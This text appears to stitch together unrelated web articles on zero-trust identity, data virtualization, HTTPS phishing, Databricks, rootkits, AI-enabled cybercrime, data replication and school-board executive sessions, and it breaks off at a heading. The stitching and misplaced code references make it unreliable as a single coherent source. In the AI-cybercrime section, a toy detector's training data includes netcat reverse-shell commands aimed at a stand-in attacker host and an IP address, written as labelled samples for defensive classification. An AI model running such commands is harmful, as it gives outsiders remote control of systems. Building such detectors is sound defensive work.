Today, data and applications are stored directly on the internet with SaaS providers and cloud infrastructure. Users are located around the world and need to be able to access their IT resources. Meanwhile, on-prem networks are looking more like internet cafes with WiFi than the fortresses of the past. Hackers no longer need to step through layers of security measures; rather, they can choose specific types of IT resources to target. The result is that IT organizations are considering different ways to approach how they protect their environments, especially regarding authenticating user identities. It was recently reported that over 81% of all breaches are caused by identity compromises (CSO). So, if ever there were something to distrust, it would be identities. But we can't just eliminate identities. We all need our credentials to access whatever IT resources are necessary.
So, how does a zero trust security model work with the fact that identities are most often the conduit to a breach?
Zero Trust Security in Identity Management
IT security experts have been developing a set of identity security practices that can solve this problem. The simplest, yet most powerful, way to confirm identity is to leverage a multi-factor authentication (MFA) approach. Requiring a second factor for machines, as well as applications, eliminates a massive amount of risk by ensuring that leaked credentials alone won't be enough to gain access (a minimal sketch of such a check appears at the end of this article). When you fortify MFA capabilities with strong passwords, SSH keys, and strong internet hygiene (i.e., ensuring that you are safe on the web with SSL/HTTPS and only going to credible sites), you can further reduce the chances of a breach. By requiring significant step-ups in authentication, as well as a keen policy of internet vigilance, IT organizations can adopt a zero trust security model and apply it to identity management.
Cloud IAM Solution for Zero Trust Security
To learn more about leveraging a zero trust security mindset in your identity management solution, contact us. If you are interested in an all-in-one, cloud-based zero trust solution, try JumpCloud® Directory-as-a-Service®. With JumpCloud, you can implement MFA, password restrictions, centralized user management, access controls and more, as well as a platform-agnostic directory service. Schedule a demo of JumpCloud, and see what it has to offer.
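As a minimal illustration of that second-factor check (this is not JumpCloud's implementation; it is a generic RFC 6238 time-based one-time password verified with Python's standard library, and the shared secret below is a placeholder):

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32: str, step: int = 30, digits: int = 6) -> str:
    """Compute an RFC 6238 time-based one-time password."""
    key = base64.b32decode(secret_b32)
    counter = struct.pack(">Q", int(time.time()) // step)  # 30-second window
    mac = hmac.new(key, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

# Placeholder secret -- in practice, provisioned per user/device at enrollment.
SECRET = "JBSWY3DPEHPK3PXP"

submitted = input("Enter your 6-digit code: ")
if hmac.compare_digest(submitted, totp(SECRET)):
    print("Second factor verified")
else:
    print("Access denied")  # a leaked password alone never gets this far
```

A real deployment would also tolerate clock drift by checking adjacent time windows and would rate-limit failed attempts.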
Too often the design of new data architectures is based on old principles: they are still very data-store-centric. They consist of many physical data stores in which data is stored repeatedly and redundantly. Over time, new types of data stores, such as data lakes, data hubs, and data lakehouses, have been introduced, but these are still data stores into which data must be copied. In fact, when data lakes are added to a data architecture, it's quite common to introduce not one data store, but a whole set of them, called zones or tiers. Having numerous data stores also implies that many programs need to be developed, maintained, and managed to copy data between the data stores.
Modern Forms of Data Usage
Organizations want to do more with data and support new forms of data usage, from the most straightforward ones to the most complex and demanding ones. These new, more demanding use cases are driven by initiatives described by such phrases as "becoming data-driven" and "digital transformation." Most organizations have evaluated their current ICT systems and have found them unable to adequately support these new forms of data usage. Conclusion: a new data architecture is required.
Legacy Design Principles Will Not Suffice
As indicated, the inclination is still to develop data processing infrastructures that are based on a data architecture that is centered around data stores and copying data. This repeated copying and storing of data reminds me of designing systems in the mainframe era. In these legacy architectures, data was also copied and transformed step-by-step in a batch-like manner. Shouldn't the goal be to minimize data stores, data redundancy, and data copying processes? Data-store-centric thinking exhibits many problems. First, the more often data is physically copied before it's available for consumption, the higher the data latency. Second, with each copying process, a potential data quality problem may be introduced. Third, physical databases can be time-consuming to change, resulting in inflexible data architectures. Fourth, from a GDPR perspective, it may not be convenient to store, for example, customer data in several databases. Fifth, such architectures are not very transparent, leading to report results that are less trusted by business users. And so on. New data architectures should be designed to be flexible, extensible, easy to change, and scalable, and they should offer low data latency (to some business users) with high data quality, deliver highly trusted reporting results, and enable easy enforcement of GDPR and comparable regulations.
Agile Architecture for Today's Data Usage
During the design of any new data architecture, the focus should be less on storing data (repeatedly) and more on the processing and use of the data. When designing a new data architecture, deploy virtual solutions where possible. Data virtualization enables data to be processed with less need to store the processed data before it can be consumed by business users. Some IT specialists might be worried about the performance of a virtual solution, but if we look at the performance of some newer database servers, that worry is unnecessary. Most organizations need new data architectures to support the fast-growing demands for data usage. Don't design a data architecture based on old architectural principles. Don't make it data-store-centric. Focus on the flexibility of the architecture. Prefer a virtual solution over a physical one.
This will enable ICT systems to keep up with the speed of business more easily while providing better, faster support for new forms of data usage.
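As a minimal sketch of the virtual-first idea (SQLite is used here purely for illustration; any engine with views, or a dedicated data virtualization layer, applies), a view exposes a transformed, always-current result without materializing a copy:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE orders (id INTEGER, customer TEXT, amount REAL, placed_at TEXT);
INSERT INTO orders VALUES
    (1, 'acme',   120.0, '2024-01-05'),
    (2, 'acme',    80.0, '2024-02-11'),
    (3, 'globex',  40.0, '2024-02-12');

-- A virtual 'data product': no copy pipeline, no stale snapshot to maintain.
CREATE VIEW customer_revenue AS
SELECT customer, SUM(amount) AS total_revenue, COUNT(*) AS order_count
FROM orders
GROUP BY customer;
""")

# Consumers query the view; the transformation runs at read time.
for row in conn.execute("SELECT * FROM customer_revenue ORDER BY customer"):
    print(row)
```

The same principle scales up: a virtualization layer federates queries across source systems so consumers see one logical schema while the data stays put.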
Be careful where you click. When you're browsing the Internet these days, you may realize the majority of sites you visit have a green padlock in the left part of the address bar, meant to indicate its HTTPS status. That HTTPS status, which indicates the website is encrypted, is important for people looking to stay secure as they swim the often murky waters of the Internet. But what happens when that symbol of security is increasingly fake? Phishing research and defense firm PhishLabs has published research indicating that hackers and criminals are becoming more likely to adopt HTTPS. About 24% of the sites that phishing emails try to get you to click on are encrypted. "That's up from less than three percent at this time last year, and less than one percent two years ago," wrote PhishLabs. Why the increase? Websites overall are increasingly being encrypted, thanks to initiatives from Let's Encrypt and Google, so it would make sense that sites meant to steal user information would also jump on the encryption bandwagon. The rate of HTTPS adoption on phishing sites is rising much faster than overall HTTPS adoption, however. Instead, HTTPS is being used to make the sites seem more legitimate in order to lure victims. "The attackers are making that choice even though this is not needed to complete the crime," Crane Hassold, a threat intelligence manager at PhishLabs, told Wired. The number of phishing sites with HTTPS is only likely to grow. So the next time you get an email that gives you pause, don't be fooled by an encrypted site. Instead, follow these tips to help you avoid taking the bait.
Big data frameworks and the accessibility of cloud computing have democratized data science. Data processing frameworks have evolved such that exceedingly large data sources can be consumed, processed, and modeled. Coupled with cloud-based solutions, the processing times now afford the data scientist the chance to focus on core data science problem solving rather than wrangling systems, platforms, and engineering concerns. At the core of the modern data science tech stack is distributed computing. This refers to the use of a network of machines that act as a single machine to complete a task. These distributed systems typically utilize a driver/worker architecture where one machine in the system is the driver and acts as a coordinator for the worker machines that execute tasks and report back to the driver. Distributed solutions provide an astounding amount of power but an equal amount of complexity, which can distract the data scientist. As distributed computing evolved, developments in data processing methodologies emerged to capitalize on the processing advances of the distributed capacity. One such processing framework is MapReduce, designed for processing large amounts of data in parallel in a reliable and fault-tolerant manner. MapReduce works in two main phases: the Map phase, where input data is split and transformed into key-value pairs, and the Reduce phase, where data is shuffled by key and then aggregated. While MapReduce was a huge step forward for distributed computing, it still has its disadvantages: 1) it is limited to batch processing; 2) it is I/O-bound to disk, which results in undesirable compute times; and 3) it was designed to work specifically with Hadoop, which limited its use cases. The shortcomings of MapReduce spurred advancements which matured into Apache Spark, an open-source unified computing engine that is up to 100x faster than Hadoop MapReduce. On top of this core processing engine, Spark has libraries for SQL, graph computation, stream processing, and machine learning, which have contributed to Spark becoming one of the most popular tools for Big Data. Spark also provides support for a multitude of languages such as Python, R, Java, Scala, and SQL. While the speed increase provided by Spark was a game changer on its own, a major key to the success of Spark is the "unified" component. Unlike MapReduce, which was designed to work with one specific kind of storage, Spark is designed to support a wide variety of persistent storage systems such as cloud storage systems like Azure or Amazon S3, distributed file systems, key-value stores, or message buses. Prior to Spark, people were forced to use a combination of different systems, libraries, and APIs in order to complete big data tasks. But with Spark's host of libraries and APIs, these tasks can be addressed over the same computing engine with a consistent set of APIs and efficient project codebases. While Spark made tremendous strides in improving ease of use, the configuration, deployment, and management of compute clusters is still shrouded in a layer of complexity that scales up as the clusters do. The use of cloud resources is optimal for distributed computing solutions due to the overhead and infrastructure required to utilize distributed computing. Using cloud solutions over on-premise hardware allows for much greater flexibility and scalability. Cloud solutions allow businesses to be agile and react quickly to changes without involving the commitments that accompany traditional on-premise hardware.
Cloud solutions can be scaled up or down at a moment's notice, whereas making changes to infrastructure involving physical equipment is more complicated and time-consuming. Physical equipment also requires maintenance and upgrades, both of which can be eliminated with cloud computing as these burdens fall to the cloud provider. Cloud solutions position businesses to leverage distributed computing. Putting it all together, Databricks has been introduced to provide a truly unified analytics platform which drives machine learning development through the deployment function. Built on Apache Spark and embedding the cluster management tools, with Databricks, one can:
- Configure, deploy, and manage clusters without having to invest in IT infrastructure
- Connect to a variety of node types including CPU- and GPU-enabled nodes of various sizes/configurations
- Utilize a managed environment including a managed version of MLflow, one of the fastest growing ML lifecycle management tools
- Build/deploy on MS Azure or Amazon Web Services
- Integrate with other resources. Databricks allows you to create mount points on the Databricks File System (DBFS) that allow you to access data easily from blob storage, a Data Lake, or even an Amazon S3 bucket.
- Integrate with Azure Data Factory, allowing businesses to leverage their existing Databricks service for things such as ETL in their data pipelines.
- Facilitate version control with a revision history built into Databricks notebooks, along with support to easily link to an existing Git repository hosted on GitHub, Bitbucket, or Azure Repos.
As all aspects of the data analytics space continue to evolve at a tremendous pace, the shortcomings of data processing and distributed computing have clearly been pain points in the data science workflow. Databricks and its suite of functionality has proven to remove a great deal of distraction from our projects. At DecisivEdge, we have developed a robust and scalable machine learning development platform based on Databricks that allows the data scientist to focus on data science. As a result, we are delivering projects faster and providing clients with higher quality deliverables.
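As a brief sketch of the map and reduce phases described earlier, expressed in Spark's Python API (the input path is a placeholder), the classic word count makes the two-phase model concrete:

```python
from pyspark.sql import SparkSession

spark = SparkSession.builder.appName("wordcount-sketch").getOrCreate()

counts = (
    spark.sparkContext.textFile("logs.txt")    # placeholder input file
         .flatMap(lambda line: line.split())   # Map: emit individual words
         .map(lambda word: (word, 1))          # Map: form (key, value) pairs
         .reduceByKey(lambda a, b: a + b)      # Reduce: shuffle by key, sum
)

for word, n in counts.take(10):
    print(word, n)

spark.stop()
```

Unlike classic MapReduce, Spark keeps intermediate results in memory where possible, which is where much of its speed advantage comes from.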
Rootkits – When Bad Turns to Ugly
Few words strike more fear into the heart of IT administrators than rootkit. Once a rootkit has been discovered, it's usually a strong indicator that one or more systems on a network have been compromised and that any data being stored on those systems is now suspect or, even worse, has been captured by the rootkit attacker to be released "into the wild" of the Internet using Pastebin or similar online anonymous data posting sites. But before you become too alarmed, let's delve a little deeper into what a rootkit is, how systems become infected with rootkits, and what you can do to prevent the rootkit infection.
What Is A Rootkit?
According to TechTarget, the definition of a rootkit is:
"A rootkit is a program or, more often, a collection of software tools that gives a threat actor remote access to and control over a computer or other system. While there have been legitimate uses for this type of software, such as to provide remote end-user support, most rootkits open a backdoor on victim systems to introduce malicious software, such as viruses, ransomware, keylogger programs or other types of malware, or to use the system for further network security attacks. Rootkits often attempt to prevent detection of malicious software by endpoint antivirus software."
As you can see by the description provided above, the term rootkit can mean a number of things. A rootkit can enable an attacker to do numerous malicious things, from logging keystrokes to capture passwords and other sensitive information, all the way to giving the attacker full control over a system. Rootkits can install other malicious programs on your operating system that do other things such as disable anti-virus/anti-malware programs, take screenshots of the computer screen while the user has certain programs open, and even allow the attacker to infect other system processes that the compromised operating system has privileged access to and "pivot" off of that host to attack other uninfected systems.
Types of Rootkits
Rootkits can contain a wide range of tools that allow a hacker to steal your passwords, making it easy for them to steal your credit card and bank account information. Rootkits can range from low-level firmware attacks through highly privileged operations. Rootkits also give hackers the ability to disable security software and to track the keys that are tapped on your computer. Because rootkits hijack security software, they are hard to detect. This makes a rootkit more likely to live on your computer for a long period of time, causing long-term computer damage. There are five common types of rootkits:
Hardware or Firmware Rootkits
This malware type can infect your computer's hard drive or its system BIOS. It can also infect your router and intercept data written to the disk.
Bootloader Rootkits
This attack replaces the bootloader on your operating system with a hacked version. The rootkit can be activated even before your operating system is running.
Memory Rootkits
This malware has access to a computer via its Random Access Memory (RAM). Fortunately, these rootkits only live in your computer's RAM until you reboot your system.
User Mode Rootkits
These rootkits can infect computer programs such as Word, Paint, Notepad, and more. Every time these programs are run, hackers will gain privileged access to a computer. These programs will still run normally, making it difficult to detect. Users may find it tough to perform rootkit detection.
Kernel Mode Rootkits
The computer's operating system is the target of a kernel mode rootkit.
Kernel mode rootkits can change how operating systems function, giving them low-level access to initiate computer commands. This makes it easy for hackers to steal data and personal information.
How Do Systems Become Infected with Rootkits?
It can be difficult to detect and remove rootkits. There is not a wide variety of commercially available products that can completely find and remove rootkits on a system. However, there are various ways users can look for a rootkit on an infected machine. These include:
- Behavioral-based methods: Use behavior-based methods to search for strange behavior that could indicate a rootkit on your computer, such as slow operating speeds, odd network traffic, or other strange behavior patterns not normal for your machine.
- Memory dump analysis: This is an effective way to detect rootkits that are hiding in a system's memory. By analyzing the data from the memory dump, you should be able to locate it.
- Signature scanning: Rootkit scans will look for signatures left by hackers and will identify if there is any foul play on the network. They should be run from a separate, clean computer while the infected one is powered off.
Computer systems can become infected with rootkits in a variety of ways. One of the most common ways that systems become infected with a rootkit is by visiting a malicious website that exploits another vulnerability resident on the user's computer system and installs the rootkit. It can also happen if the user attaches an infected USB thumb-drive or other media container to the system that exploits a known, or unknown, vulnerability and infects the system with the rootkit. Viruses and other malware play a part in the rootkit scenario as well. Many malware payloads carry commands to download a rootkit from a remote source and install it on the user's system.
From Humble Beginnings Comes a Nightmare
In years long since past, before there was commercial software such as Microsoft Remote Desktop or even WebEx, computer scientists created their own rootkits as a means of controlling remote systems and being able to work on items that they may not have been able to work on locally. Fast forward to just a few years ago and you'll find that rootkits were adopted by people in the hacking underground for more nefarious actions. Once rootkits were weaponized, the game was over. Unpatched computers around the globe became targets for rootkits overnight, and thus the nefarious use of rootkits was born.
Can I Stop a Rootkit From Infecting Me? Steps You Can Take to Protect Against Rootkits
Yes, you can! There are basic steps that every user can learn to protect themselves from becoming infected with a rootkit. Here are some rootkit detection and prevention examples.
Keep your system patched against vulnerabilities and threats. Pay close attention to advisories from software and hardware manufacturers and apply what they release to address issues as soon as possible. This helps ensure that the rootkit attacker won't have an easy way to infect your device(s) and helps safeguard you. Remember though, keeping your system up-to-date includes not only the operating systems that you use but the web browser, office automation software (word processing, spreadsheet, presentation), and other applications that may have patches available for them to protect you from rootkit infection.
Keep your anti-virus and anti-malware software up-to-date. This is one of the most crucial things you can do to ensure that you do not become infected with a rootkit.
If your anti-virus and anti-malware software is not up to date, there is a chance that you'll become infected with a rootkit that could possibly even disable your protection mechanisms and take your computer over for nefarious use.
Be mindful of the websites that you view. Many "bad" sites are set up to look for weaknesses in the user's web browser and use that as an entryway to infect them. Thankfully, many modern browsers (Microsoft Edge, Google Chrome, and Mozilla Firefox) have the resources to alert users when they travel to a site that is known to be bad. They do this by taking advantage of crowd-sourced information about websites that may be potentially hazardous for users to visit and then making the information available to all users of the browser by putting up an alert page that warns the user that the site is known to be bad and that if they visit it they are doing so at their own risk.
On the application development side, make sure that your applications are tested for security issues before they go into a production setting. Primarily you want to be looking for SQL injection and buffer overflow issues. You can use penetration testing or automated code reviews (or both) to detect and remove issues before the application goes into production settings. These types of vulnerabilities could allow an attacker to compromise the system with administrator or "root" privileges, install a rootkit, and turn the host into a system that could potentially infect the computers of users who utilize the application for business or personal use.
Be cautious of the software that you download and install on your computer. Over time there have been many software packages that have been compromised and had a rootkit added to them, so when you install the backdoored software you're also installing the rootkit along with it. Always download from known-good application stores such as the Apple App Store and Google Play or from reputable sources that the Internet community as a whole feels confident in. While this is still not 100% protection, it goes a long way to helping ensure that your system does not become infected with a rootkit from compromised apps or other types of software. If you can, always try to check the MD5 or SHA256 sum to make sure what you download has the same hash value as what the creator has on their website (a short checksum sketch appears at the end of this post). If it doesn't have the same value, DON'T INSTALL IT! It has potentially been tampered with. Even better, look for a PGP/GPG signature for the application on the creator's website to see if you can validate the signing key used when the application was published.
What Can I Do If I Become Infected with a Rootkit?
So, say you've taken all of the precautions outlined in the article and you still become infected with a rootkit. What can you do? First off, all is not lost. Many times, there are "clean up" tools made by anti-virus and anti-malware vendors that you can use to rid your system of the rootkit and its associated tool sets. However, with that being said, there is always a chance that the "clean up" tool will not catch all rootkits. Why? Because just like viruses and other types of malware, rootkits are always evolving so that they can circumvent the protection measures that users put in place on their computers. So, what do you do at this point?
If you want to be absolutely sure that your system is "clean" and that the rootkit has been removed, then you will more than likely need to "scratch" the computer and wipe the drive of all of its contents. At this point you'll need to reinstall the operating system and all of the applications that used to reside on the platform. Oh, and the files that you had on the system? Consider them suspect as well, as some attackers will use rootkits to install other types of malware into files such as Word documents, spreadsheets, and even presentations. So remember, if you re-import those files back onto your computer, you may inadvertently re-infect the system, and then you're back to square one. If all else fails, call in a professional that deals with rootkits and similar issues so that they can guide you through the recovery process. Will it cost money? Yes. However, you're also buying yourself peace of mind, so that when you use your computer (or, in a business setting, when one of your users does) you know that the system is safe to use and won't start the infection process all over again.
While rootkits can be difficult to detect and can inflict damage on personal and commercial computers, it doesn't have to be the end of the world. There are ways to manage systems to lower your risk and, in the case of infection, a myriad of ways to recover from rootkits. However, by putting some basic practices in place as outlined in this post, there are ways to reduce your risk and still use your computer without fear of compromise.
About Digital Defense
- Asset discovery and tracking
- OS and web application risk assessment
- Targeted malware threat assessment
- Machine learning features that leverage threat intelligence
- Agentless & agent-based scanning
- Penetration testing for networks, mobile applications, and web applications
- Compliance management. One of the world's longest tenured PCI-Approved Scanning Vendors
Our SaaS platform virtually eliminates false positives associated with legacy vulnerability management solutions, while also automating the tracking of dynamic and transient assets and prioritizing results based on business criticality.
About the Author
Our Vulnerability Research Team consists of credentialed (Security+, Network+, CISSP) cybersecurity experts with decades of combined experience in research, analysis, and the discovery of unknown vulnerabilities.
Do More to Protect Against Malicious Programming
Get the guide Dissecting Ransomware: Understanding Types, Stages, and Prevention for more information about how to better protect your organization against malicious programs.
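As a companion to the download-verification advice earlier in this post, here is a minimal Python sketch of that checksum step. The file name and expected digest below are placeholders, not real values; always use the digest published by the software's creator.

```python
import hashlib

def sha256_of(path: str, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large downloads need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

# Placeholders: substitute the real file and the vendor's published digest.
expected = "0000000000000000000000000000000000000000000000000000000000000000"
actual = sha256_of("installer.bin")

if actual != expected:
    raise SystemExit("Checksum mismatch - DON'T INSTALL IT!")
print("Checksum OK")
```

Note that a matching checksum only proves the file you received is the file the publisher posted; a PGP/GPG signature additionally ties it to the publisher's key.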
AI poses a major threat to cybersecurity
Human vulnerability and social engineering are the biggest targets in the majority of cybercrimes, and AI can assist cybercriminals by hitting that key weakness; with an AI-styled attack on human vulnerabilities, both the human and cybersecurity products may fail to detect it. AI technology can both enhance cybersecurity measures and pose a threat to them. On the one hand, AI can be used to detect and prevent cyber attacks, as well as analyze vast amounts of data to identify potential threats. However, on the other hand, AI can also be used by cybercriminals to carry out attacks that are more sophisticated and harder to detect.
One way that scammers can leverage AI is through the use of "deepfake" technology. Deepfakes are videos or audio recordings that have been manipulated using AI to make them appear authentic, even though they are not. Scammers can use deepfakes to create fake videos or audio recordings of individuals, such as CEOs or government officials, and then use those recordings to trick people into giving them sensitive information or money.
Another way that scammers can use AI is through the use of "chatbots." Chatbots are computer programs that are designed to mimic human conversation. Scammers can use chatbots to engage with people online, pretending to be a legitimate company or organization, and then use the conversation to extract sensitive information from their targets.
A more serious threat is that AI can be used to automate and scale phishing attacks. By using AI algorithms to craft convincing phishing emails and messages, cybercriminals and scammers can send out a large volume of messages with a high degree of personalization, making it more likely that their targets will fall for the scam.
AI can also be used to carry out "credential stuffing" attacks. In a credential stuffing attack, scammers use automated bots to try out lists of usernames and passwords on different websites until they find a match. By using AI to generate these lists and automate the attack, scammers can carry out attacks on a much larger scale than would be possible manually.
Overall, AI technology can be both a powerful tool for enhancing cybersecurity measures and a potent weapon in the hands of cybercriminals. As the technology continues to advance, it is likely that both the benefits and the risks will continue to grow. DIGITPOL believes that governments should take action now (March 2023) to rapidly regulate the use of AI, as the threats to security are enormous if not handled. The key points to focus on:
- AI can also be used to carry out Distributed Denial of Service (DDoS) attacks. By using AI to direct an army of bots to attack a specific target, scammers can overwhelm the target's servers and effectively take them offline.
- AI can be used to bypass security measures such as firewalls, intrusion detection systems, and antivirus software. By training AI algorithms to identify and exploit vulnerabilities in these systems, attackers can gain unauthorized access to sensitive information.
- AI can be used to automate the process of discovering and exploiting new vulnerabilities. By analyzing vast amounts of data and identifying patterns, AI can quickly discover new vulnerabilities and exploit them before they can be patched.
- AI can be used to carry out advanced persistent threats (APTs), which are long-term, targeted attacks designed to gain access to sensitive information.
By using AI to automate the process of reconnaissance, scammers can gather information on their targets and then use that information to launch targeted attacks.
- AI can be used to create "zero-day" exploits, which are attacks that take advantage of previously unknown vulnerabilities in software or hardware. By using AI to analyze and reverse engineer software, scammers can discover these vulnerabilities and create exploits before they are discovered by the software's creators.
- AI can be used to create more convincing fake websites and social media profiles, making it easier to carry out phishing attacks and other types of social engineering scams.
- AI can be used to carry out "fuzzing" attacks, which involve inputting large amounts of random or invalid data into an application or system in order to trigger errors or crashes. By using AI to generate and input this data, scammers can quickly identify vulnerabilities that may be missed by traditional testing methods.
- AI can be used to generate and distribute malware, including ransomware and trojans. By using AI to analyze and identify vulnerabilities in target systems, scammers can create malware that is more effective at bypassing security measures and spreading undetected.
- AI can be used to carry out "living off the land" attacks, which involve using legitimate tools and software already installed on a system to carry out malicious activities. By using AI to automate these attacks, scammers can make them more efficient and difficult to detect.
- AI can be used to carry out "adversarial attacks" on machine learning models used in cybersecurity. By using AI to generate malicious input data, scammers can cause these models to produce incorrect results, leading to false positives or false negatives and potentially allowing attackers to bypass security measures.
- AI can be used to carry out "cyber-physical attacks," which involve manipulating physical systems such as industrial control systems or critical infrastructure. By using AI to identify vulnerabilities in these systems and create targeted attacks, scammers can cause significant damage or disruption.
DIGITPOL states that the number one crime that will increase with AI technology is email scams: phishing attacks will rise to a new level as AI automates a high degree of personalisation, meaning victims will fall more easily for such fraudulent mails. AI's offensive capabilities are built from experience-based learning and self-learning; therefore, we can be certain that AI will increase cybercrime if cybercriminals can leverage the technology. Social engineering is an easy target for AI-related attacks.
As AI continues to advance, it is likely that we will see new and more sophisticated ways in which it can be used to pose threats to cybersecurity. It is important for cybersecurity professionals to stay up-to-date on these developments and to develop new tools and strategies to detect and prevent AI-enabled attacks. DIGITPOL states that it is vital that cybersecurity vendors advance their detection signatures to identify AI-styled attacks. Since December 2022, Digitpol has been developing a machine learning AI plugin to learn and identify specific patterns and signatures associated with criminal use of code, such as malware or botnets, and flag them for investigation.
Digitpol states that machine learning algorithms can be trained to recognise patterns and behaviours associated with malicious code, and this can help detect and prevent cyber attacks. By using AI to flag suspicious code, human analysts can then investigate and take appropriate action to mitigate the threat (a hypothetical sketch of this idea follows below). The AI market is a rapidly growing industry, with an estimated value of $62.35 billion in 2021 and projected to reach $733.7 billion by 2027, according to a report by MarketsandMarkets. This growth is driven by increasing demand for AI technologies in various industries such as healthcare, finance, and retail, as well as the development of new AI applications and the integration of AI into existing systems.
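As a minimal, hypothetical sketch of that pattern-flagging idea (toy data with invented snippets; this is not Digitpol's plugin, just a generic text classifier built with Python and scikit-learn):

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression

# Toy training set: labeled snippets (1 = suspicious, 0 = benign). Real systems
# train on large corpora of known-malicious and known-benign code.
snippets = [
    "powershell -enc SQBFAFgA...",            # encoded command: suspicious
    "nc -e /bin/sh attacker.example 4444",    # reverse shell: suspicious
    "print('hello world')",                   # benign
    "for i in range(10): total += i",         # benign
]
labels = [1, 1, 0, 0]

vectorizer = TfidfVectorizer(analyzer="char_wb", ngram_range=(3, 5))
features = vectorizer.fit_transform(snippets)
model = LogisticRegression().fit(features, labels)

candidate = "nc -e /bin/bash 203.0.113.7 9001"
score = model.predict_proba(vectorizer.transform([candidate]))[0, 1]
print(f"suspicion score: {score:.2f}")  # high scores go to a human analyst
```

The flagged items are triage hints, not verdicts; as noted above, human analysts investigate before taking action.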
Data Management Glossary
What is replication?
Replication, or data replication, is the process of creating and maintaining one or more copies of data, files, or information in multiple locations or systems in order to increase data availability, reliability, and performance. The purpose of replication is to ensure that data is always available, even if one of the copies becomes unavailable due to hardware failure, network issues, or other disruptions. Replication can be done in different ways, depending on the specific requirements of the data and the systems involved. For example, replication can be done in real-time or near real-time, and the copies can be stored locally or remotely. Replication can also be done synchronously or asynchronously, with synchronous replication ensuring that all copies are identical at all times, and asynchronous replication allowing some lag time between updates to the different copies. Replication is used in various systems and technologies, including databases, file systems, cloud storage services, and content delivery networks (CDNs). It is often an essential part of high-availability and disaster recovery (DR) strategies, as it can help ensure that data is always accessible even in the face of unexpected events. Cloud replication is the process of replicating data or services from a primary cloud environment to one or more secondary cloud environments, typically to improve the availability, reliability, and durability of data and services in the cloud, and to provide DR capabilities. In a cloud replication scenario, data is automatically copied and synchronized between different cloud regions, data centers, or cloud providers, depending on the specific requirements of the system and the data. Cloud replication can be done in real-time or near real-time, and the copies can be stored locally or remotely. Some cloud providers offer automatic replication features, which enable customers to easily configure and manage replication of their data and services across multiple regions or providers. Cloud replication can also be used to ensure compliance with data sovereignty and privacy regulations, as it allows data to be stored in multiple locations, each subject to different laws and regulations. It can also improve performance by enabling users to access data and services from the nearest available location. Overall, cloud replication is an important part of any cloud-based disaster recovery and business continuity plan. It can help organizations minimize the impact of unexpected events, such as natural disasters or cyber attacks, and ensure that critical data and services are always available to users. Watch the webinar: Komprise for cloud-to-cloud replication use cases.
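As an illustrative sketch of the synchronous/asynchronous distinction (plain Python dictionaries stand in for real storage systems), the difference comes down to when a write is acknowledged:

```python
import queue
import threading

primary: dict = {}
replica: dict = {}
replication_log: queue.Queue = queue.Queue()

def write_sync(key, value):
    """Synchronous: acknowledge only after every copy is updated."""
    primary[key] = value
    replica[key] = value                # caller waits for the replica write
    return "ack"

def write_async(key, value):
    """Asynchronous: acknowledge after the primary write; replicate later."""
    primary[key] = value
    replication_log.put((key, value))   # replica catches up with some lag
    return "ack"

def replicator():                       # background worker applying the log
    while True:
        key, value = replication_log.get()
        replica[key] = value
        replication_log.task_done()

threading.Thread(target=replicator, daemon=True).start()

write_sync("a", 1)                      # no lag, but slower acknowledgment
write_async("b", 2)                     # fast acknowledgment, brief lag window
replication_log.join()                  # wait for the async write to drain
print(primary, replica)                 # both now hold {'a': 1, 'b': 2}
```

Synchronous replication buys zero data loss at the cost of write latency; asynchronous replication reverses that trade, which is why many systems offer both.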
Issues associated with executive session board meetings
Executive session board meetings often bring about thoughts of secrecy and back-room deals. When a public school board requires an executive session board meeting, the chair of the school board should take time to evaluate and validate the needs of the closed session. Public school boards work hard to establish trust with the local community, and executive session board meetings can threaten that trust and transparency. It is imperative that the public school board utilizes executive session board meetings effectively, efficiently, and ethically. There are several issues associated with executive session board meetings. It is imperative that the public school board evaluate the need and details related to the executive session board meeting to avoid any problems or concerns that could dissolve trust or break policy or laws.
Using Executive Session Board Meetings Unethically
Some school boards will call an executive session board meeting for 'personnel reasons' if they feel like their agenda for an open meeting is threatened. Once hidden from public view, decisions are made that should include public input or be made at an open meeting. Using executive session board meetings in this way undermines the purpose of the public board meetings. Stating that an executive session board meeting will be used to discuss a valid issue, but then switching to an issue that should be discussed in an open meeting, is unethical and can cultivate a culture that lacks integrity and promotes concealment and secrecy. When public school board members get into the habit of using executive session board meetings in unethical ways, it is imperative that the school board chair revisit important training materials regarding open meeting laws, closed meetings, and open meetings with board members.
Open Meeting Laws and Executive Session Board Meetings
Every state has reasons that an executive session board meeting may be called; some states greatly differ from others in these reasons. Purposes for executive session board meetings may include specific personnel issues, setting strategies for bargaining or litigation, and budget cuts and exemptions. For these reasons, it is imperative that school board members are knowledgeable regarding their state's open meeting laws. For example, Texas' Open Meetings Act permits executive session board meetings when a board may be meeting with their attorney regarding litigation or a settlement offer, for deliberating personnel matters, discussing the purchase or lease of property, discussing certain financial contract negotiations, or discussing the deployment of security devices. School boards may include the rationale for the executive session board meeting on the meeting agenda. The chapter and section of the state's open meeting law related to your board's meeting topic should be included in the agenda. Maintaining this information can be helpful in validating the purpose of the executive session board meeting should your board face litigation. State open meeting laws outline what the school board will need to know regarding holding an executive session board meeting, so it is imperative that school board members are abreast of these regulations. Utilizing the right board management software, materials regarding the state's open meeting laws can be shared within the portal for continuous reference.
BoardDocs allows board members to create training events (for instance, a training covering open meeting laws) and share and access materials related to these trainings. Documents related to policies, laws, and regulations can also be accessed in the 'Library' feature, where these materials are also searchable by keyword.
Executive Session Board Meeting Agendas and Materials
